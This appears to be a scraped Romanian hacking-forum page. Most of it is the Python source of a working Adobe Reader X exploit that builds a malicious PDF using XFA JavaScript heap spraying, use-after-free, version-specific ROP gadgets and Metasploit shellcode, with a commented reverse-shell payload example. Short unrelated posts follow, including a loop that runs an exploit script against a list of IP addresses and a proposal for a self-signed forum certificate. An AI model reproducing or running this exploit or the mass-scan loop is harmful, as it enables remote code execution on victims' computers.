PDFObject.__init__(self) assert type(s) == type([]) self.s=s def append(self,o): self.s.append(o) return self def __str__(self): return "[%s]"%(" ".join([ o.__str__() for o in self.s])) ## PDF REference 3rd edition:: 3.2.6 Dictionary Objects class PDFDict(PDFObject): def __init__(self, d={}): PDFObject.__init__(self) self.dict = {} for k in d: self.dict[k]=d[k] def __iter__(self): for k in self.dict.keys(): yield k def __iterkeys__(self): for k in self.dict.keys(): yield k def __getitem__(self, key): return self.dict[key] def add(self,name,obj): self.dict[name] = obj def get(self,name): if name in self.dict.keys(): return self.dict[name] else: return None def __str__(self): s="<<" for name in self.dict: s+="%s %s "%(PDFName(name),self.dict[name]) s+=">>" return s ## PDF REference 3rd edition:: 3.2.7 Stream Objects class PDFStream(PDFDict): def __init__(self,d={},stream=""): PDFDict.__init__(self,d) self.stream=stream self.filtered=self.stream self.add('Length', len(stream)) self.filters = [] def appendFilter(self, filter): self.filters.append(filter) self._applyFilters() #yeah every time .. so what! def _applyFilters(self): self.filtered = self.stream for f in self.filters: self.filtered = f.encode(self.filtered) if len(self.filters)>0: self.add('Length', len(self.filtered)) self.add('Filter', PDFArray([f.name for f in self.filters])) #Add Filter parameters ? def __str__(self): self._applyFilters() #yeah every time .. so what! s="" s+=PDFDict.__str__(self) s+="\nstream\n" s+=self.filtered s+="\nendstream" return s ## PDF REference 3rd edition:: 3.2.8 Null Object class PDFNull(PDFObject): def __init__(self): PDFObject.__init__(self) def __str__(self): return "null" ## PDF REference 3rd edition:: 3.2.9 Indirect Objects class UnResolved(PDFObject): def __init__(self,n,v): PDFObject.__init__(self) self.n=n self.v=v def __str__(self): return "UNRESOLVED(%d %d)"%(self.n,self.v) class PDFRef(PDFObject): def __init__(self,obj): PDFObject.__init__(self) self.obj=[obj] def __str__(self): if len(self.obj)==0: return "null" return "%d %d R"%(self.obj[0].n,self.obj[0].v) ## PDF REference 3rd edition:: 3.3 Filters ## Example Filter... class FlateDecode: name = PDFName('FlateDecode') def __init__(self): pass def encode(self,stream): return zlib.compress(stream) def decode(self,stream): return zlib.decompress(stream) ## PDF REference 3rd edition:: 3.4 File Structure ## Simplest file structure... class PDFDoc(): def __init__(self,obfuscate=0): self.objs=[] self.info=None self.root=None def setRoot(self,root): self.root=root def setInfo(self,info): self.info=info def _add(self,obj): if obj.v!=None or obj.n!=None: raise Exception("Already added!!!") obj.v=0 obj.n=1+len(self.objs) self.objs.append(obj) def add(self,obj): if type(obj) != type([]): self._add(obj); else: for o in obj: self._add(o) def _header(self): return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n" def __str__(self): doc1 = self._header() xref = {} for obj in self.objs: xref[obj.n] = len(doc1) doc1+="%d %d obj\n"%(obj.n,obj.v) doc1+=obj.__str__() doc1+="\nendobj\n" posxref=len(doc1) doc1+="xref\n" doc1+="0 %d\n"%(len(self.objs)+1) doc1+="0000000000 65535 f \n" for xr in xref.keys(): doc1+= "%010d %05d n \n"%(xref[xr],0) doc1+="trailer\n" trailer = PDFDict() trailer.add("Size",len(self.objs)+1) if self.root == None: raise Exception("Root not set!") trailer.add("Root",PDFRef(self.root)) if self.info: trailer.add("Info",PDFRef(self.info)) doc1+=trailer.__str__() doc1+="\nstartxref\n%d\n"%posxref doc1+="%%EOF" return doc1 ######### End of miniPDF SLIDESIZE=0x12C def mkBMP(payload, exception=True): bmp = '' #getInfoHeader bfType = 0x4d42 assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp bmp += struct.pack('<H', bfType) bfSize = 0 bfOffBits = 0 bmp += struct.pack('<L', bfSize) bmp += struct.pack('<H', 0) #Reserved1 bmp += struct.pack('<H', 0) #Reserved2 bmp += struct.pack('<L', bfOffBits) biSize = 0x40 assert not biSize in [0x12] bmp += struct.pack('<L', biSize) biHeight = 1 biWidth = SLIDESIZE #size of texture structure LFH enabled biPlanes = 1 biBitCount = 8 biCompression = 1 biSizeImage = 0 biXPelsPerMeter = 0 biYPelsPerMeter = 0 biClrUsed = 2 if biClrUsed >0xff: raise "BUG!!!!" biClrImportant = 0 bmp += struct.pack('<L', biWidth) bmp += struct.pack('<L', biHeight) bmp += struct.pack('<H', biPlanes) bmp += struct.pack('<H', biBitCount) bmp += struct.pack('<L', biCompression) bmp += struct.pack('<L', biSizeImage) bmp += struct.pack('<L', biXPelsPerMeter) bmp += struct.pack('<L', biYPelsPerMeter) bmp += struct.pack('<L', biClrUsed) bmp += struct.pack('<L', biClrImportant) bmp += 'A'*(biSize-0x40) #pad numColors=biClrUsed if biClrUsed == 0 or biBitCount < 8: numColors = 1<<biBitCount; bmp += 'RGBA'*(numColors) #pallete bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff) #while (len(bmp)+10)%0x400 != 0: # bmp += '\x00\x02\x00\x00' assert len(payload) < 0x100 and len(payload) >= 3 bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00' bmp += '\x00'+chr(len(payload))+payload if len(payload)&1 : bmp += 'P' if exception: bmp += '\x00\x02\x00\xff'*10 #getting the pointer outside the texture so it triggers an exception bmp += '\x00'+chr(10)+'X'*10 else: bmp += '\x00\x01' #'\x04X'*(biWidth+2000)+"\x00\x02" return bmp def UEncode(s): r = '' s += '\x00'*(len(s)%2) for i in range(0,len(s),2): r+= '\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0]) return r r = '' for c in s: r+= '%%%02x'%ord(c) return r def mkXFAPDF(shellcode = '\x90'*0x400+'\xcc'): xdp = ''' <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7"> <template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/"> <?formServer defaultPDFRenderFormat acrobat9.1static?> <?formServer allowRenderCaching 0?> <?formServer formModel both?> <subform name="form1" layout="tb" locale="en_US" restoreState="auto"> <pageSet> <pageArea name="Page1" id="Page1"> <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/> <medium stock="default" short="612pt" long="792pt"/> <?templateDesigner expand 1?> </pageArea> <?templateDesigner expand 1?> </pageSet> <variables> <script name="util" contentType="application/x-javascript"> // Convenience functions to pack and unpack litle endian an utf-16 strings function pack(i){ var low = (i & 0xffff); var high = ((i>>16) & 0xffff); return String.fromCharCode(low)+String.fromCharCode(high); } function unpackAt(s, pos){ return s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16); } function packs(s){ result = ""; for (i=0;i<s.length;i+=2) result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8)); return result; } function packh(s){ return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16)); } function packhs(s){ result = ""; for (i=0;i<s.length;i+=4) result += packh(s.slice(i,i+4)); return result; } var verbose = 1; function message(x){ if (util.verbose == 1 ) xfa.host.messageBox(x); } //ROP0 //7201E63D XCHG EAX,ESP //7201E63E RETN //ROP1 //7200100A JMP DWORD PTR DS:[KERNEL32.GetModuleHandle] //ROP2 //7238EF5C PUSH EAX //7238EF5D CALL DWORD PTR DS:[KERNEL32.GetProcAddress] //7238EF63 TEST EAX,EAX //7238EF65 JNE SHORT 7238EF84 //7238EF84 POP EBP //7238EF85 RETN 4 //ROP3 //72001186 JMP EAX ; kernel32.VirtualProtect //ROP4 //72242491 ADD ESP,70 //72242494 RETN var _offsets = {'Reader": { "10.104": { "acrord32": 0xA4, "rop0": 0x1E63D, "rop1": 0x100A, "rop2": 0x38EF5C, "rop3": 0x1186, "rop4": 0x242491, }, "10.105": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, "10.106": { // Added by Eddie Mitchell "acrord32": 0xA5, "rop0": 0x1E52D, "rop1": 0x100A, "rop2": 0x393526, "rop3": 0x1186, "rop4": 0x245E71, }, }, "Exchange-Pro": { "10.105": { // Added by Eddie Mitchell "acrobat": 0xCD, "rop0": 0x3720D, "rop1": 0x100A, "rop2": 0x3DCC91, "rop3": 0x180F, "rop4": 0x25F2A1, }, }, }; function offset(x){ //app.viewerType will be "Reader" for Reader, //"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro try { return _offsets[app.viewerType][app.viewerVersion][x]; } catch (e) { xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!"); } return 0x41414141; } </script> <script name="spray" contentType="application/x-javascript"> // Global variable for spraying var slide_size=%%SLIDESIZE%%; var size = 200; var chunkx = "%%MINICHUNKX%%"; var x = new Array(size); var y = new Array(size); var z = new Array(size); var pointers = new Array(100); var done = 0; </script> <?templateDesigner expand 1?> </variables> <subform w="576pt" h="756pt"> <!-- This image fiel hold the cashing image --> <field name="ImageCrash"> <ui> <imageEdit/> </ui> <value> <image aspect="actual" contentType="image/jpeg">%%BMPFREELFH%%</image> </value> </field> </subform> <event activity="initialize" name="event__initialize"> <script contentType="application/x-javascript"> // This script runs at the very beginning and // is used to prepare the memory layout util.message("Initialize"); var i; var j; if (spray.done == 0){ //Trigger LFH use var TOKEN = "\u5858\u5858\u5678\u1234"; var chunk_len = spray.slide_size/2-1-(TOKEN.length+2+2); for (i=0; i < spray.size; i+=1) spray.x[i] = TOKEN + util.pack(i) + spray.chunkx.substring(0, chunk_len) + util.pack(i) + ""; util.message("Initial spray done!"); for (j=0; j < size; j++) for (i=spray.size-1; i > spray.size/4; i-=10) spray.x[i]=null; spray.done = 1; util.message("Generating holes done!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"); } // After this the form layout is rendered and the bug triggered </script> </event> <event activity="docReady" ref="$host" name="event__docReady"> <script contentType="application/x-javascript"> // This script runs once the page is ready util.message("DocReady"); var i; var j; var found = -1; // Index of the overlapped string var acro = 0; // Base of the AcroRd32_dll // Search over all strings for the first one with the broken TOKEN for (i=0; i < spray.size; i+=1) if ((spray.x[i]!=null) && (spray.x[i][0] != "\u5858")){ found = i; acro = (( util.unpackAt(spray.x[i], 14) >> 16) - util.offset("acrord32")) << 16; util.message("Found! String number "+ found + " has been corrupted acrord32.dll:" + acro.toString(16) ); break; } // Behaviour is mostly undefined if not found if (found == -1){ util.message("Corrupted String NOT Found!"); event.target.closeDoc(true); } // Corrupted string was found let's generates the new // string for overlapping the struct before freeing it var chunky = ""; for (i=0; i < 7; i+=1) chunky += util.pack(0x41414141); chunky += util.pack(0x10101000); while (chunky.length < spray.slide_size/2) chunky += util.pack(0x58585858); // Free the overlapping string util.message("Feeing corrupted string! Previous string will we used-free ("+(found)+")"); for (j=0; j < 100000; j++) spray.x[found-1]=spray.x[found]=null; // Trigger several allocs that will fall over the structure for (i=0; i < 200; i+=1){ ID = "" + i; spray.y[i] = chunky.substring(0,spray.slide_size/2-ID.length) + ID+ ""; } util.message("Allocated 20 chunks-y\\n"); // Heap spraying make's baby jesus cry! // Construct the 0x1000 small chunk for spraying var obj = 0x10101000; var pointer_slide = ""; pointer_slide += util.pack(acro+util.offset("rop4")); //add esp,70;ret for (i=0; i < 27; i+=1) pointer_slide += util.pack(0x41414141); obj += pointer_slide.length*2; // ROP pointer_slide += util.pack(acro+util.offset("rop0")); //XCHG EAX,ESP;ret pointer_slide += util.pack(acro+util.offset("rop1")); //0x100A jmp getmodule pointer_slide += util.pack(acro+util.offset("rop2")); //@0x04 - getProcAddress pointer_slide += util.pack(obj+0xDC); //@0x08 point to KERNEL32 //@0x10 pointer_slide += util.pack(obj+0xCC); pointer_slide += util.pack(0x43434343); // POPPED TO EBP pointer_slide += util.pack(acro+util.offset("rop3")); // JMP EAX pointer_slide += util.pack(obj); //Points to offset 0 of this //@0x20 pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(obj+0x38); pointer_slide += util.pack(0x1000); //SIZE_T dwSize, pointer_slide += util.pack(0x40); // DWORD flNewProtect, //0x30 pointer_slide += util.pack(obj+0x34); //PDWORD lpflOldProtect pointer_slide += util.pack(0x00000000); //DWORD OldProtect pointer_slide += util.packhs("E9B1000000909090"); //0x40 pointer_slide += util.pack(acro); //Used by next stage pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x50 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x60 pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.pack(0xCCCCCCCC); //0x70 pointer_slide += util.pack(acro); pointer_slide += util.pack(0x48484848); pointer_slide += util.pack(0x49494949); pointer_slide += util.pack(0x49494949); //0x80 pointer_slide += util.pack(0x49494949); pointer_slide += util.pack(0x50505050); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0x90 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xa0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xb0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xc0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.packs("VirtualProtect"); //@0xCC pointer_slide += "\u0000"; pointer_slide += "KERNEL32"; pointer_slide += "\u0000"; pointer_slide += "%%SHELLCODE%%"; while (pointer_slide.length < 0x1000/2) pointer_slide += util.pack(0x41414141); pointer_slide = pointer_slide.substring(0,0x1000/2); util.message("Pointer slide size: " + pointer_slide.length); // And now ensure it gets bigger than 0x100000 bytes while (pointer_slide.length < 0x100000/2) pointer_slide += pointer_slide; // And the actual spray for (i=0; i < 100; i+=1) spray.pointers[i] = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + ""; // Everything done here close the doc and // trigger the use of the vtable util.message("Now what?"); var pdfDoc = event.target; pdfDoc.closeDoc(true); </script> </event> </subform> <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?> <?templateDesigner DefaultLanguage JavaScript?> <?templateDesigner DefaultRunAt client?> <?acrobat JavaScript strictScoping?> <?PDFPrintOptions embedViewerPrefs 0?> <?PDFPrintOptions embedPrintOnFormOpen 0?> <?PDFPrintOptions scalingPrefs 0?> <?PDFPrintOptions enforceScalingPrefs 0?> <?PDFPrintOptions paperSource 0?> <?PDFPrintOptions duplexMode 0?> <?templateDesigner DefaultPreviewType interactive?> <?templateDesigner DefaultPreviewPagination simplex?> <?templateDesigner XDPPreviewFormat 19?> <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> <?templateDesigner Zoom 119?> <?templateDesigner FormTargetVersion 30?> <?templateDesigner SaveTaggedPDF 1?> <?templateDesigner SavePDFWithEmbeddedFonts 1?> <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template> <config xmlns="http://www.xfa.org/schema/xci/3.0/"> <agent name="designer"> <!-- [0..n] --> <destination>pdf</destination> <pdf> <!-- [0..n] --> <fontInfo/> </pdf> </agent> <present> <!-- [0..n] --> <pdf> <!-- [0..n] --> <version>1.7</version> <adobeExtensionLevel>5</adobeExtensionLevel> </pdf> <common/> <xdp> <packets>*</packets> </xdp> </present> </config> <localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/"> <locale name="en_US" desc="English (United States)"> <calendarSymbols name="gregorian"> <monthNames> <month>January</month> <month>February</month> <month>March</month> <month>April</month> <month>May</month> <month>June</month> <month>July</month> <month>August</month> <month>September</month> <month>October</month> <month>November</month> <month>December</month> </monthNames> <monthNames abbr="1"> <month>Jan</month> <month>Feb</month> <month>Mar</month> <month>Apr</month> <month>May</month> <month>Jun</month> <month>Jul</month> <month>Aug</month> <month>Sep</month> <month>Oct</month> <month>Nov</month> <month>Dec</month> </monthNames> <dayNames> <day>Sunday</day> <day>Monday</day> <day>Tuesday</day> <day>Wednesday</day> <day>Thursday</day> <day>Friday</day> <day>Saturday</day> </dayNames> <dayNames abbr="1"> <day>Sun</day> <day>Mon</day> <day>Tue</day> <day>Wed</day> <day>Thu</day> <day>Fri</day> <day>Sat</day> </dayNames> <meridiemNames> <meridiem>AM</meridiem> <meridiem>PM</meridiem> </meridiemNames> <eraNames> <era>BC</era> <era>AD</era> </eraNames> </calendarSymbols> <datePatterns> <datePattern name="full">EEEE, MMMM D, YYYY</datePattern> <datePattern name="long">MMMM D, YYYY</datePattern> <datePattern name="med">MMM D, YYYY</datePattern> <datePattern name="short">M/D/YY</datePattern> </datePatterns> <timePatterns> <timePattern name="full">h:MM:SS A Z</timePattern> <timePattern name="long">h:MM:SS A Z</timePattern> <timePattern name="med">h:MM:SS A</timePattern> <timePattern name="short">h:MM A</timePattern> </timePatterns> <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols> <numberPatterns> <numberPattern name="numeric">z,zz9.zzz</numberPattern> <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern> <numberPattern name="percent">z,zz9%</numberPattern> </numberPatterns> <numberSymbols> <numberSymbol name="decimal">.</numberSymbol> <numberSymbol name="grouping">,</numberSymbol> <numberSymbol name="percent">%</numberSymbol> <numberSymbol name="minus">-</numberSymbol> <numberSymbol name="zero">0</numberSymbol> </numberSymbols> <currencySymbols> <currencySymbol name="symbol">$</currencySymbol> <currencySymbol name="isoname">USD</currencySymbol> <currencySymbol name="decimal">.</currencySymbol> </currencySymbols> <typefaces> <typeface name="Myriad Pro"/> <typeface name="Minion Pro"/> <typeface name="Courier Std"/> <typeface name="Adobe Pi Std"/> <typeface name="Adobe Hebrew"/> <typeface name="Adobe Arabic"/> <typeface name="Adobe Thai"/> <typeface name="Kozuka Gothic Pro-VI M"/> <typeface name="Kozuka Mincho Pro-VI R"/> <typeface name="Adobe Ming Std L"/> <typeface name="Adobe Song Std L"/> <typeface name="Adobe Myungjo Std M"/> </typefaces> </locale> <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data xfa:dataNode="dataGroup"/> </xfa:datasets> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about=""> <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate> <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool> <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate> <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate> </rdf:Description> <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about=""> <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer> </rdf:Description> <rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about=""> <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID> <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID> </rdf:Description> <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about=""> <dc:format>application/pdf</dc:format> </rdf:Description> </rdf:RDF> </x:xmpmeta> <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"> <annots/> </xfdf></xdp:xdp> ''' assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry" #shellcode xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode)) xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE); xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE)) xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64')) #xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64')) file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp) #The document doc = PDFDoc() #font font = PDFDict() font.add("Name", PDFName("F1")) font.add("Subtype", PDFName("Type1")) font.add("BaseFont", PDFName("Helvetica")) #name:font map fontname = PDFDict() fontname.add("F1",font) #resources resources = PDFDict() resources.add("Font",fontname) #contents contentsDict = PDFDict() contents= PDFStream(contentsDict, '''BT /F1 24 Tf 100 100 Td (Pedefe Pedefeito Pedefeon!) Tj ET''') #page page = PDFDict() page.add("Type",PDFName("Page")) page.add("Resources",resources) page.add("Contents", PDFRef(contents)) #pages pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids", PDFArray([PDFRef(page)])) pages.add("Count", PDFNum(1)) #add parent reference in page page.add("Parent",PDFRef(pages)) xfa = PDFStream(PDFDict(), xdp) xfa.appendFilter(FlateDecode()) doc.add(xfa) #form form = PDFDict() form.add("XFA", PDFRef(xfa)) doc.add(form) #shellcode2 shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10) doc.add(shellcode2) #catalog catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Pages", PDFRef(pages)) catalog.add("NeedsRendering", "true") catalog.add("AcroForm", PDFRef(form)) adbe = PDFDict() adbe.add("BaseVersion","/1.7") adbe.add("ExtensionLevel",PDFNum(3)) extensions = PDFDict() extensions.add("ADBE", adbe) catalog.add("Extensions",extensions) doc.add([catalog,pages,page,contents]) doc.setRoot(catalog) #render it return doc.__str__() if __name__ == '__main__': import optparse,os from subprocess import Popen, PIPE parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit') parser.add_option('--debug', action='store_true', default=False, help='For debugging') parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 'win32_exec CMD=calc'") parser.add_option('--payload', metavar='PAYLOAD', default=None) parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation') (options, args) = parser.parse_args() if options.doc: print __doc__ os.exit(-1) if options.debug: print mkXFAPDF(), os.exit(-1) if options.payload == None: #"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R" msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE) shellcode = msfpayload.communicate()[0] else: shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex') print mkXFAPDF(shellcode), Sursa: Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption

E contul tau?

for ip in `cat ips.txt` do nohup perl expl.pl $ip > /dev/null done

Ideea nu e deloc rea. O sa vad ce se poate face, ma gandeam asa: 1. Creez un CA pentru RST 2. Semnez un certificat pentru server (self-signed) 3. Userii vor putea descarca si instala CA-ul pentru ca RST sa fie validat 4. Asta ma gandeam sa se faca doar optional, pentru cine vrea, pe un subdomeniu: secure.rstforums.com Pareri? PS: Pentru cine nu a inteles idee, asa cum exista posibilitatea ca NSA-ul si mai stiu eu ce organizatii sa aiba cheile private de la Facebook, Google (certificate SSL)... Exista posibilitatea sa aiba cheile private (cu care sunt semnate certificatele) de la firmele care ofera certificate: VeriSign, Comodo, StartSSL... Astfel, acele organizatii (NSA) pot face Man in the Middle pe trafic. Daca insa folosim un certificat self-signed, vor avea nevoie de cheia de pe serverul RST. Cei drept e cam paranoia si nu cred ca se complica nimeni atat pentru RST si un pusti care vinde un root...